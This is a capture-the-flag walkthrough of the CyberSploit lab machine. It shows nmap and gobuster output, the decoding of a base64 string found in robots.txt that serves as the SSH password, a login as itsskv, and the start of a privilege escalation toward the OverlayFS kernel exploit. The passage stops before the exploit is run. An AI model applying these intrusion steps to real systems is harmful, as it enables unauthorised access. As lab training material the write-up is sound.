Pwned Date - 5th July 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Going to port 80 and we have a webpage, while on the view source we get the username itsskv

Untitled

Untitled

On fuzzing we found /robots.txt

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.81.92/> -w /usr/share/wordlists/dirb/common.txt -q -t 200   
/.htpasswd            (Status: 403) [Size: 290]
/.hta                 (Status: 403) [Size: 285]
/.htaccess            (Status: 403) [Size: 290]
/cgi-bin/             (Status: 403) [Size: 289]
/index                (Status: 200) [Size: 2333]
/index.html           (Status: 200) [Size: 2333]
/robots               (Status: 200) [Size: 53]  
/robots.txt           (Status: 200) [Size: 53]  
/server-status        (Status: 403) [Size: 294]

Untitled

Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

After decoding its just a YouTube to https://www.youtube.com/c/cybersploit

cybersploit{youtube.com/c/cybersploit}

Exploitation

And that cybersploit{youtube.com/c/cybersploit} is actually password I also stunned

┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  <https://help.ubuntu.com/>

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.

itsskv@cybersploit-CTF:~$ whoami
itsskv
itsskv@cybersploit-CTF:~$ cat local.txt
7c45634ebf5ab293ee75d93484e9c382

Privilege Escalation

itsskv@cybersploit-CTF:/home/cybersploit$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

itsskv@cybersploit-CTF:/home/cybersploit$ cat /etc/issue
Ubuntu 12.04.5 LTS \\n \\l

So this version of Ubuntu is kinda old, which is vulnerable to OverlayFS

Offensive Security's Exploit Database Archive

Copy the whole script as ofs.c and upload to the target at /tmp